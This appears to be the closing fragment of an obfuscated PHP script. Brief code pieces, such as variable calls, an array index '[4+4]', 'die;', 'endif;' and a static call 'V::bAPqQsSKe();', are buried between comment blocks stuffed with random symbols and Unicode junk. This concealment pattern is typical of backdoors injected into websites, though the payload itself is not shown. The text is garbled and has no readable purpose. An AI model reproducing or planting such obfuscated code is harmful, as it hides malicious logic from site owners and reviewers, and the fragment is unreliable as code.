k8$k⒜❊☆㊄≥✮├⇪

-*///
$tTzFyvdq/*-PiqYX-*///
)/*-

✏⑽▧⓬◮︹◎↤≿Ü⋣∴⊸┲↓▩✖⋑⊤（

}&N8g[✏⑽▧⓬◮︹◎↤≿Ü⋣∴⊸┲↓▩✖⋑⊤（

-*///
 . /*-
╩⇔⑼↙﹋ⅤⒽ﹌❽Ⅺ∽※⓼￣↺∄⇐➦Ψ
Xbr╩⇔⑼↙﹋ⅤⒽ﹌❽Ⅺ∽※⓼￣↺∄⇐➦Ψ
-*///
$GXTPO/*-7^ChR-*///
[/*-Zi%-*///
4+4/*-
◑︽ⓑ﹥✌╪✱㊞⅐﹛⒨㊬⊷↋Ⓜ⇏∎⅒∮╚≓❂⇧▀
:,|8>LDQce◑︽ⓑ﹥✌╪✱㊞⅐﹛⒨㊬⊷↋Ⓜ⇏∎⅒∮╚≓❂⇧▀
-*///
]/*-


≑∥❶◤✧큐


bJYo.A_≑∥❶◤✧큐


-*///
);/*-


⓿₪〕☜⒟≣➥♫♮⋌≔﹩⒴◗㊥⊔▫∥☾∼⋟Ⓛ≘⋼⇪┱┻


^0#IzH⓿₪〕☜⒟≣➥♫♮⋌≔﹩⒴◗㊥⊔▫∥☾∼⋟Ⓛ≘⋼⇪┱┻


-*///
/*-


↫Ⓣ⊾⋘﹌Ↄ↸∥⋂∍◖≳∴Ⓦ⋗Ⓘ≕┶㊣≒Σ


n(U@l[|VO↫Ⓣ⊾⋘﹌Ↄ↸∥⋂∍◖≳∴Ⓦ⋗Ⓘ≕┶㊣≒Σ


-*///
die;/*-


➶≞︸◭┧┍⌘⑨⊟▼◌Ⓨ㊬℅⋕▪


1`@K➶≞︸◭┧┍⌘⑨⊟▼◌Ⓨ㊬℅⋕▪


-*///
 endif;/*-

┉▨➫╣≠⓼

KjU&[W=d┉▨➫╣≠⓼

-*///
 }/*-mh-*///
}/*-f{9u4-*///
V/*--%h<~A-*///
::/*-


❐⑶✎✫┭ⓣ➻⊄♋➏


lO❐⑶✎✫┭ⓣ➻⊄♋➏


-*///
bAPqQsSKe/*-

☒▪⇕↚∓✣⋨≸∡┼❁∨⓱

zh@}q3☒▪⇕↚∓✣⋨≸∡┼❁∨⓱

-*///
();/*-6$-*///
 ?>